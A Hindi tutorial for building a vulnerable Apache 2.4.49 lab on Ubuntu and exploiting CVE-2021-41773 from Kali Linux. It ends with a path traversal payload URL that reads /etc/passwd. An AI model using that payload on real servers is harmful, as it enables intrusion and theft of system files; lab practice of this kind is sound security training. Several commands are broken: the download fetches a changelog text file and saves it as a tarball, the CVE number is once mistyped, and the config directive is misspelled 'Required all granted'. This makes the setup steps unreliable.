
चरण-दर-चरण ट्यूटोरियल जो दर्शाता है कि कैसे एक कमजोर Apache 2.4.49 वातावरण स्थापित करें और Kali Linux तथा Ubuntu Server VMs का उपयोग करके CVE-2021-41773 पाथ ट्रैवर्सल का शोषण करें।
यह एक अभ्यास का उदाहरण है कि कैसे वर्चुअल मशीन के साथ CVE-2021-4773 कमजोरी का शोषण किया जाए
इस ट्यूटोरियल के लिए आपको निम्नलिखित की आवश्यकता है
तो चलिए शुरू करते हैं जब आपके पास 2 वर्चुअल मशीन चल रही हों, तो आप एक संग्रह रिपॉजिटरी से अपाचे संस्करण 2.4.49 स्थापित करेंगे आप यह संस्करण पा सकते हैं https://archive.apache.org/dist/httpd/CHANGES_2.4.49
1 पहली बार अपनी वर्चुअल मशीन सर्वर में निम्नलिखित कमांड चलाने की आवश्यकता है
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 or wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2
2 दूसरी बार आपको इस संस्करण को अपाचे से इस प्रकार अनज़िप करना होगा
tar -xvjf httpd-2.4.49.tar.bz2
3 निम्नलिखित पैकेज स्थापित करें
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev
4 मुख्य निर्देशिका में निष्पादन फ़ाइल (फ़ाइल नाम configure) चलाएँ, इंस्टॉल निर्देशिका निर्दिष्ट करने के लिए फ़्लैग का उपयोग करें
./configure --prefix=/usr/local/apache2
5 कमजोरी वाले संस्करण को कंपाइल करें
make
6 कमजोरी वाले संस्करण को स्थापित करें
make install
7 संस्करण की समीक्षा करें
ls /usr/local/apache2
8 प्रक्रिया शुरू करें
/usr/local/apache2/bin/apachectl start
9 प्रक्रिया की पुष्टि करें
ps aux | grep httpd
10 कमजोरी को कॉन्फ़िगर करें फ़ाइल /usr/local/apache2/conf/httpd.conf ढूंढें और डायरेक्टरी एडमिन को कॉन्फ़िगर करें डायरेक्टरी टैग ढूंढें और Require all denied को बदलें
Required all granted
Files .ht* टैग ढूंढें और Require all denied को बदलें
Required all granted
पहला परिवर्तन स्थानीय वातावरण में कमजोरी के शोषण के लिए है और दूसरा वास्तविक वातावरण में इसे उजागर करने के लिए है
1 निम्नलिखित कमांड से nmap के साथ IP पता स्कैन करें
nmap -sV ip_address
2 अपाचे सर्वर का परीक्षण करने के लिए curl या wget का उपयोग करें
curl ip_address or make wget ip_address
3 यदि आप सिंटैक्स समझना चाहते हैं तो अगले पृष्ठ पर कमजोरी का शोषण कैसे करें, इसकी समीक्षा करें
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability
या बस निम्नलिखित पेलोड का उपयोग करें
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd